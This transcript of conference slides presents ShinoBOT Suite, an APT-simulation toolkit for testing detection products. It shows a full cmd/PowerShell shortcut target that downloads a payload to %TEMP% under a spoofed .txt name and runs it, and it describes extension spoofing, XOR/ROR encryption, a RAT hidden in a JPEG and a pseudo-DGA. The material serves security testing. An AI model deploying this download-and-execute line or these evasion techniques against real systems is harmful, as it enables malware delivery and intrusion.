ShinoBOT Suite Presentation

Posted on 20-Apr-2022

TRANSCRIPT

Page 1: ShinoBOT Suite Presentation


Page 2: ShinoBOT Suite Presentation

Shota Shinogi @Sh1n0g1

http://shinosec.com

Security Researcher at Macnica Networks Corp.

Japanese distributor of security/network products

Enthusiast of writing (ethical) malware

Presented ShinoBOT (not Suite) last year at Arsenal

Page 3: ShinoBOT Suite Presentation

ShinoBOT.exe

ShinoBOT is a RAT (simulator)

Presented at Black Hat USA 2013 Arsenal

It connects to ShinoC2, the C&C server, using HTTP(S).

What you can do with ShinoBOT via ShinoC2

Execute a command

Upload / Download a file

Take a screenshot

It is a SIMULATOR

it has a GUI

you need the password, which is shown on the GUI, to control it

Page 4: ShinoBOT Suite Presentation

ShinoBOT Suite is a toolkit that creates an APT-style attack with just a few clicks, to simulate a highly sophisticated attack campaign.

What is contained

Exploit (Shortcut contains a malicious script)

Malware Delivery Server (ShinoMAL.mooo.com)

Downloader/Dropper (ShinoDownloader.exe)

RAT (ShinoBOT.exe)

C&C Server (ShinoC2)

Steganography, crypto, DGA and some evasion techniques

Page 5: ShinoBOT Suite Presentation

There are many new security tools to detect and respond to unknown threats

Sandbox-based Malware Detection System

ETDR (Endpoint Threat Detection & Response)

SIEM (Security Information & Event Manager)

Security Analytics / Network Forensics

It is hard to evaluate those new products

Known malware will be detected by signature

♦ ≠ Unknown Threat

To simulate a realistic APT

♦ requires a high skill level

♦ takes too much time

♦ costs a lot of money when using commercial tools

Page 6: ShinoBOT Suite Presentation

[Attack-flow diagram] Components: Malicious Shortcut, Downloader/Dropper (dldr_tmp), RAT (ShinoBOT.exe), Decoy File, C&C Server, Malware Deploy Server, img.jpg. Steps: 1) Download, 2) Execute, 3) Drop, 4) Open, 5) Download, 6) Decrypt, 7) Execute, 8) C2 Communication.


Page 8: ShinoBOT Suite Presentation

Page 9: ShinoBOT Suite Presentation

Page 10: ShinoBOT Suite Presentation

Page 11: ShinoBOT Suite Presentation

Page 12: ShinoBOT Suite Presentation

Page 13: ShinoBOT Suite Presentation

Decoy File

ShinoBOT works in the background

Page 14: ShinoBOT Suite Presentation

To control ShinoBOT (RAT), you need to grab the password; this is to prevent abuse of ShinoBOT.

ShinoBOT saves its password to the same folder (C:\Users\%USERNAME%\sb.pas)

You can access the password file remotely: \\%MACHINENAME%\C$\Users\%USERNAME%\sb.pas

Page 15: ShinoBOT Suite Presentation

To control ShinoBOT (RAT), you need to grab the password; this is to prevent abuse of ShinoBOT.

ShinoBOT saves its password in this text file. (C:\Users\%USERNAME%\sb.pas)

You can access the password file remotely: \\%MACHINENAME%\C$\Users\%USERNAME%\sb.pas

This password protection is to prevent the real bad guys from abusing ShinoBOT.

Page 16: ShinoBOT Suite Presentation

Access ShinoBOT.com

Go to the host list

Your host will appear in the host list

Click the [View/Assign Jobs] link

Page 17: ShinoBOT Suite Presentation

Enter the password to see the Loot (result) of the command

Enter the password to assign a new job

Page 18: ShinoBOT Suite Presentation

Malicious Shortcut

"target" of the shortcut (all on one line)

cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('DOWNLOADERURL', '%TEMP%\LicenseRnd.txt'); & %TEMP%\LicenseRnd.txt & ::DECOYFILENAME

POWERSHELL downloads the downloader and saves it

CMD executes the downloader (Rnd means a random string)

CMD ignores this part because :: means a comment

Page 19: ShinoBOT Suite Presentation

Extension Spoofing

On the target of the shortcut, there is the string "%TEMP%\LicenseRnd.txt" (previous slide)

Usually, when you double-click a file with .txt, Notepad will launch

CMD.exe can execute executables (files containing the MZ header) with any extension

ShinoBOT Suite uses this technique to spoof the extension and make the downloader hard to find on the disk

Actually, it is ShinoDownloader.exe

Page 20: ShinoBOT Suite Presentation

Crypto Stuff

ShinoBOT Suite uses XOR and ROR (4-bit rotate)

The key is used just for the XOR, and the ROR is always 4 bits

ShinoBOT Suite generates a random key (200 ~ 255 bytes), so it is a little bit difficult to decrypt the whole file without having the key
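A model of the XOR + ROR(4) scheme described on this slide, written as an added example (it is not ShinoBOT Suite's own code). The slide does not say whether the key repeats cyclically or whether the XOR comes before the rotate; both are assumptions here, as is the per-byte rotate. The last function shows the caveat an analyst would raise about "difficult without the key": the rotate adds no secrecy, so known plaintext bytes give back key bytes.

```python
import secrets

# Added example, not ShinoBOT Suite's own code: a model of the XOR + ROR(4)
# scheme the slide describes. Assumptions (the slide does not say): the key
# bytes are applied cyclically, XOR is applied before the rotate, and the
# rotate works on each byte on its own.

def ror4(b: int) -> int:
    """Rotate an 8-bit value right by 4 bits, i.e. swap its two nibbles."""
    return ((b >> 4) | (b << 4)) & 0xFF

def generate_key() -> bytes:
    """Random key of 200 to 255 bytes, the length range given on the slide."""
    return secrets.token_bytes(200 + secrets.randbelow(56))

def encrypt(data: bytes, key: bytes) -> bytes:
    return bytes(ror4(c ^ key[i % len(key)]) for i, c in enumerate(data))

def decrypt(data: bytes, key: bytes) -> bytes:
    # A 4-bit rotate of a byte is its own inverse, so applying ror4 again
    # undoes it; then the XOR is stripped with the same key byte.
    return bytes(ror4(c) ^ key[i % len(key)] for i, c in enumerate(data))

def recover_key_prefix(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """Analyst's caveat on 'difficult without the key': the rotate adds no
    secrecy, so every plaintext byte that is already known (for example the
    fixed leading bytes of a PE file) gives back the matching key byte."""
    return bytes(ror4(c) ^ p for c, p in zip(ciphertext, known_plaintext))

# Constructed sample payload: a fake 'MZ' header followed by filler bytes.
SAMPLE_PAYLOAD = b"MZ\x90\x00" + bytes(range(256)) * 2

def demo() -> bool:
    """Round-trip the sample through a fresh key and show the known-prefix
    leak; returns True when both behave as described."""
    key = generate_key()
    blob = encrypt(SAMPLE_PAYLOAD, key)
    roundtrip_ok = decrypt(blob, key) == SAMPLE_PAYLOAD
    leak_ok = recover_key_prefix(blob, SAMPLE_PAYLOAD[:4]) == key[:4]
    return roundtrip_ok and leak_ok

if __name__ == "__main__":
    print("round trip and known-prefix leak OK:", demo())
```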

Page 21: ShinoBOT Suite Presentation

Steganography

The encrypted RAT is hidden in the kitten image.

[Binary Visualizer figure: JPG data, followed by the Encrypted RAT]
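The binary visualizer shows the encrypted RAT sitting after the JPG data, so a defender's check for this kind of image is to look for bytes past the JPEG End Of Image marker. This is an added example, not ShinoBOT Suite code, and it assumes the blob is simply appended to the image (the slide does not state how it is embedded).

```python
# Added example, not part of ShinoBOT Suite: a defender's check for data
# appended after a JPEG. The slide's binary visualizer shows the encrypted RAT
# after the JPG data; assuming the blob is simply appended (the slide does not
# say how it is embedded), anything past the End Of Image marker is suspect.

RST_MARKERS = range(0xD0, 0xD8)  # restart markers, legal inside scan data

def jpeg_trailing_data(blob: bytes) -> bytes:
    """Walk the JPEG segment structure and return whatever follows the
    End Of Image (FF D9) marker. Raises ValueError on malformed input."""
    if blob[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 2 <= len(blob):
        if blob[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = blob[pos + 1]
        if marker == 0xD9:                            # EOI: image ends here
            return blob[pos + 2:]
        if marker == 0xFF:                            # fill byte, skip it
            pos += 1
            continue
        if marker == 0x01 or marker in RST_MARKERS:   # markers without length
            pos += 2
            continue
        if pos + 4 > len(blob):
            raise ValueError("truncated segment header")
        pos += 2 + int.from_bytes(blob[pos + 2:pos + 4], "big")
        if marker == 0xDA:                            # SOS: scan data follows
            # In scan data FF is followed by a stuffed 00 or a restart marker;
            # any other byte after FF is the next real marker (usually EOI).
            while pos + 1 < len(blob):
                if blob[pos] == 0xFF and blob[pos + 1] not in (0, *RST_MARKERS):
                    break
                pos += 1
    raise ValueError("no EOI marker found")

def has_appended_payload(blob: bytes) -> bool:
    return len(jpeg_trailing_data(blob)) > 0

# Constructed minimal JPEG: SOI, APP0, a tiny SOS whose scan data holds a
# stuffed FF 00 and an RST0 marker, then EOI. Only the marker layout matters.
SAMPLE_JPEG = (b"\xff\xd8"
               + b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
               + b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00"
               + b"\x12\x34\xff\x00\x56\xff\xd0\x78" + b"\xff\xd9")
# Constructed appended blob that itself starts with FF D9, which defeats a
# naive 'find the last FF D9' check but not the segment walk above.
SAMPLE_PAYLOAD = b"\xff\xd9" + b"ENCRYPTED-RAT-PLACEHOLDER"
```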

Page 22: ShinoBOT Suite Presentation

Domain Generation Algorithm

ShinoBOT (the RAT) uses a pseudo-DGA.

It generates a random host name for the C2 server.

rrrr.r.shinobot.com

"r" is replaced by a random character.

The DNS of shinobot.com responds to any host name with the C2 server IP address.

Page 23: ShinoBOT Suite Presentation

[Attack-flow diagram, phishing variant] Elements: Phishing Email, Exploit / ShellCode, Downloader/Dropper (KB1234567.exe), RAT (ShinoBOT.exe), Decoy File (Invitation.pdf, legitimate), C&C Server, Malware Deploy Server, img.jpg. Steps: 1) Download, 2) Execute, 3) Drop, 4) Open, 5) Download, 6) Decrypt, 7) Execute, 8) C2 Communication.

Page 24: ShinoBOT Suite Presentation

Visit my site and get the recipe of ShinoBOT SUITE.

http://shinosec.com